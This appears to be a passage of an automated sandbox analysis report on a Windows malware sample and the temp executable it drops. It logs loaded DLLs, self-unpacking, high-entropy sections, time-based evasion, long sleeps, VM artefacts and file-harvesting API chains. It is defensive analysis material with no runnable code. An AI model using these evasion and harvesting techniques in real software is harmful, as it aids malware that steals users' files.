Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Unpacked PE file: 3.2.4CC1.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Unpacked PE file: 0.2.7gxaFDUSOD.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Unpacked PE file: 3.2.4CC1.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_009AF1BA pushad ; ret	0_2_009AF1D6
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_009AF338 push ecx; ret	0_2_009AF355
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_009AC70C pushad ; ret	0_2_009AC734
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_009ACBAD push 00000003h; ret	0_2_009ACBB1
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_009AAE02 push es; iretd	0_2_009AAE13
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024809CD push ecx; ret	0_2_024809E0
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024A799F push esp; retf	0_2_024A79A7
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0248CE18 push ss; retf	0_2_0248CE1D
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0247FFF3 push ecx; ret	0_2_02480006
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024A7F9D push esp; retf	0_2_024A7F9E
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024A9DE8 pushad ; retf	0_2_024A9DEF
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008EEC86 push ebp; iretd	3_2_008EECB9
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008F05BC push ebx; iretd	3_2_008F05E7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008EBDE0 push ebx; ret	3_2_008EBE45
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008ECE00 push 00000032h; retf	3_2_008ECE02
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008EDD7F push B35707CFh; iretd	3_2_008EDE73
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008EDD7F pushad ; iretd	3_2_008EDEF1
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008EF77D push edx; iretd	3_2_008EF78E
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008F057A pushad ; retf	3_2_008F057B
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_008EDE74 pushad ; iretd	3_2_008EDEF1
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02477B2C push ecx; ret	3_2_02477B3F

Source: 7gxaFDUSOD.exe	Static PE information: section name: .text entropy: 7.5518716228789815
Source: 4CC1.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.114733173591553

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

File created: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Jump to dropped file

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Window / User API: threadDelayed 671			Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Window / User API: threadDelayed 9294			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Evasive API call chain: GetSystemTime,DecisionNodes			graph_3-32747
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-65667

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	API coverage: 3.2 %

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe TID: 2884	Thread sleep count: 671 > 30	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe TID: 2884	Thread sleep time: -484462s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe TID: 2884	Thread sleep count: 9294 > 30	Jump to behavior
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe TID: 2884	Thread sleep time: -6710268s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004389F2 FindFirstFileExW,	0_2_004389F2
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024A8C59 FindFirstFileExW,	0_2_024A8C59
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02461EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_02461EA7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_0246CF47
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02463F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_02463F27
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0245DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_0245DFD7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02451807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_02451807
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02461827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_02461827
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02451820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	3_2_02451820
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_0246D8A7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	3_2_0246E0B7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02465127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_02465127
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_0246E597

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Code function: 3_2_024733F7 GetSystemInfo,wsprintfA,

3_2_024733F7

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
